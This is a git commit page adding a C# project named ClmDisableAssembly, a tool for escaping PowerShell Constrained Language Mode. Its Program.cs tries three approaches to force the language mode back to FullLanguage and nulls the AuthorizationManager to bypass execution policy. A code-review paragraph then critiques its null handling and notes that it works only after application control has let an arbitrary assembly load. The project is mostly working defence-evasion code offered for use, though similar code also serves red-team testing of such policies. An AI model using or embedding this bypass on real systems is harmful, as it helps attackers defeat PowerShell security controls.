Added Bypass-ConstrainedLanguageMode

mb
2019-06-21 04:52:38 +02:00
parent 4aa113e076
commit 4e17445eaf
14 changed files with 903 additions and 0 deletions


@ -0,0 +1,79 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5054C13F-1351-47B9-A6CA-25F4548F68A7}</ProjectGuid>
<OutputType>Library</OutputType>
<RootNamespace>ClmDisableAssembly</RootNamespace>
<AssemblyName>ClmDisableAssembly</AssemblyName>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
<PublishUrl>publish\</PublishUrl>
<Install>true</Install>
<InstallFrom>Disk</InstallFrom>
<UpdateEnabled>false</UpdateEnabled>
<UpdateMode>Foreground</UpdateMode>
<UpdateInterval>7</UpdateInterval>
<UpdateIntervalUnits>Days</UpdateIntervalUnits>
<UpdatePeriodically>false</UpdatePeriodically>
<UpdateRequired>false</UpdateRequired>
<MapFileExtensions>true</MapFileExtensions>
<ApplicationRevision>0</ApplicationRevision>
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
<IsWebBootstrapper>false</IsWebBootstrapper>
<UseApplicationTrust>false</UseApplicationTrust>
<BootstrapperEnabled>true</BootstrapperEnabled>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<StartupObject />
</PropertyGroup>
<PropertyGroup />
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
<HintPath>System.Management.Automation.dll</HintPath>
</Reference>
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="app.manifest" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1</ProductName>
<Install>false</Install>
</BootstrapperPackage>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>


@ -0,0 +1,75 @@
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace ClmDisableAssembly
{
public class ClmDisableAssembly
{
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
static extern int GetCurrentThreadId();
public static int Start(string arg)
{
Console.WriteLine("[+] Managed mode assembly. Disabling CLM globally.");
Console.WriteLine("\tCurrent thread ID (managed/unmanaged): " + System.Threading.Thread.CurrentThread.ManagedThreadId.ToString() + " / " + GetCurrentThreadId().ToString());
if (arg.Length > 0)
{
Console.WriteLine($"\tPassed argument: '{arg}'");
}
// Switches back to FullLanguage in CLM
Runspace.DefaultRunspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;
try
{
Runspace.DefaultRunspace.InitialSessionState.LanguageMode = PSLanguageMode.FullLanguage;
// Bypasses PowerShell execution policy
Runspace.DefaultRunspace.InitialSessionState.AuthorizationManager = null;
}
catch (Exception e)
{
Console.WriteLine("[-] Approach #1 failed: " + e);
}
try
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.ApartmentState = System.Threading.ApartmentState.STA;
runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
runspace.Open();
runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;
runspace.Close();
}
catch (Exception e)
{
Console.WriteLine("[-] Approach #2 failed: " + e);
}
try
{
InitialSessionState initialSessionState = InitialSessionState.CreateDefault();
initialSessionState.ApartmentState = System.Threading.ApartmentState.STA;
initialSessionState.AuthorizationManager = null;
initialSessionState.ThreadOptions = PSThreadOptions.UseCurrentThread;
using (Runspace runspace = RunspaceFactory.CreateRunspace(initialSessionState))
{
runspace.Open();
runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;
runspace.InitialSessionState.AuthorizationManager = null;
runspace.InitialSessionState.LanguageMode = PSLanguageMode.FullLanguage;
runspace.Close();
}
}
catch (Exception e)
{
Console.WriteLine("[-] Approach #3 failed: " + e);
}
return 0;
}
}
}
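Review bot: `Start` dereferences `arg` (the `arg.Length` check) and `Runspace.DefaultRunspace` (the first `SessionStateProxy.LanguageMode` assignment) before any of the `try` blocks, so a null argument or a calling thread without a default runspace ends in an unhandled NullReferenceException rather than the logged failure the three later approaches produce; `if (!string.IsNullOrEmpty(arg))` covers the first case. The runspace created in approach #2 is not disposed if `Open()` or the property assignment throws, whereas approach #3 wraps the same calls in `using`. The class also has no summary comment: it should state that the code only has an effect once the host has already allowed an arbitrary managed assembly to load into the PowerShell process, which is the step an application-control policy (WDAC or AppLocker) is expected to refuse, so reviewers and defenders read it as a test of that policy rather than of the language mode alone. The comment `// Bypasses PowerShell execution policy` deserves the same precision, since the line it annotates sets `InitialSessionState.AuthorizationManager` to null and nothing visible here shows that the already-open default runspace re-reads it.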

View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// Ogólne informacje o zestawie są kontrolowane poprzez następujący
// zestaw atrybutów. Zmień wartości tych atrybutów, aby zmodyfikować informacje
// powiązane z zestawem.
[assembly: AssemblyTitle("ClmDisableAssembly")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ClmDisableAssembly")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Ustawienie elementu ComVisible na wartość false sprawia, że typy w tym zestawie są niewidoczne
// dla składników COM. Jeśli potrzebny jest dostęp do typu w tym zestawie z
// COM, ustaw wartość true dla atrybutu ComVisible tego typu.
[assembly: ComVisible(false)]
// Następujący identyfikator GUID jest identyfikatorem biblioteki typów w przypadku udostępnienia tego projektu w modelu COM
[assembly: Guid("5054c13f-1351-47b9-a6ca-25f4548f68a7")]
// Informacje o wersji zestawu zawierają następujące cztery wartości:
//
// Wersja główna
// Wersja pomocnicza
// Numer kompilacji
// Rewizja
//
// Możesz określić wszystkie wartości lub użyć domyślnych numerów kompilacji i poprawki
// przy użyciu symbolu „*”, tak jak pokazano poniżej:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]